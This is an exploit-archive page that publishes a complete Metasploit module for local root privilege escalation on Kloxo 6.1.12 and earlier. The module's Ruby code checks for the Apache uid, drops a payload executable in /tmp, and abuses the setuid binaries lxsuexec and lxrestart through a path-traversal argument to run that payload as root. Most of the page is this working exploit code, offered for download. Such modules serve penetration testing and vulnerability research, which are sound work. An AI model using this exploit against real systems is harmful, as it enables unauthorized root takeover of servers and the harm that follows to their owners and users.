what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kloxo 6.1.12 Privilege Escalation

Kloxo 6.1.12 Privilege Escalation
Posted May 15, 2013
Authored by juan vazquez, HTP | Site metasploit.com

Kloxo versions 6.1.12 and below contain two setuid root binaries. lxsuexec and lxrestart allow local privilege escalation to root from uid 48, Apache by default on CentOS 5.8, the operating system supported by Kloxo. This Metasploit module has been tested successfully with Kloxo 6.1.12 and 6.1.6.

tags | exploit, local, root
systems | linux, centos
SHA-256 | a70607f00778f48b03ab7e80bcb005fc5ae1a0f4e784ea6219b2ca83f16982c7

Kloxo 6.1.12 Privilege Escalation

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# https://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'

class Metasploit4 < Msf::Exploit::Local

include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::FileDropper

include Msf::Exploit::Local::Linux

def initialize(info={})
super(update_info(info, {
'Name' => 'Kloxo Local Privilege Escalation',
'Description' => %q{
Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as
lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,
Apache by default on CentOS 5.8, the operating system supported by Kloxo.
This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.
},
'License' => MSF_LICENSE,
'Author' =>
[
'HTP', # Original PoC according to exploit-db
'juan vazquez' # Metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Payload' =>
{
'Space' => 8000,
'DisableNops' => true
},
'References' =>
[
[ 'EDB', '25406' ],
[ 'URL', 'https://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
],
'Targets' =>
[
[ 'Kloxo 6.1.12', {} ]
],
'DefaultOptions' =>
{
'PrependSetuid' => true
},
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => "Sep 18 2012"
}))
end

def exploit
# apache uid (48) is needed in order to abuse the setuid lxsuexec binary
# .text:0804869D call _getuid
# .text:080486A2 cmp eax, 48
# .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)
# .text:080486A7 mov [ebp+var_A4], 0Ah
# .text:080486B1 jmp loc_8048B62 // finish if uid != 48
# .text:08048B62 loc_8048B62: ; CODE XREF: main+39j
#.text:08048B62 ; main+B0j
#.text:08048B62 mov eax, [ebp+var_A4]
#.text:08048B68 add esp, 0ECh
#.text:08048B6E pop ecx
#.text:08048B6F pop esi
#.text:08048B70 pop edi
#.text:08048B71 pop ebp
#.text:08048B72 lea esp, [ecx-4]
#.text:08048B75 retn
#.text:08048B75 main endp
print_status("Checking actual uid...")
id = cmd_exec("id -u")
if id != "48"
fail_with(Exploit::Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")
end

# Write msf payload to /tmp and give provide executable perms
pl = generate_payload_exe
payload_path = "/tmp/#{rand_text_alpha(4)}"
print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")
write_file(payload_path, pl)
register_file_for_cleanup(payload_path)

# Profit
print_status("Exploiting...")
cmd_exec("chmod +x #{payload_path}")
cmd_exec("LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`")
cmd_exec("export MUID=$LXLABS")
cmd_exec("export GID=$LXLABS")
cmd_exec("export TARGET=/bin/sh")
cmd_exec("export CHECK_GID=0")
cmd_exec("export NON_RESIDENT=1")
helper_path = "/tmp/#{rand_text_alpha(4)}"
write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
register_file_for_cleanup(helper_path)
cmd_exec("lxsuexec #{helper_path}")
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close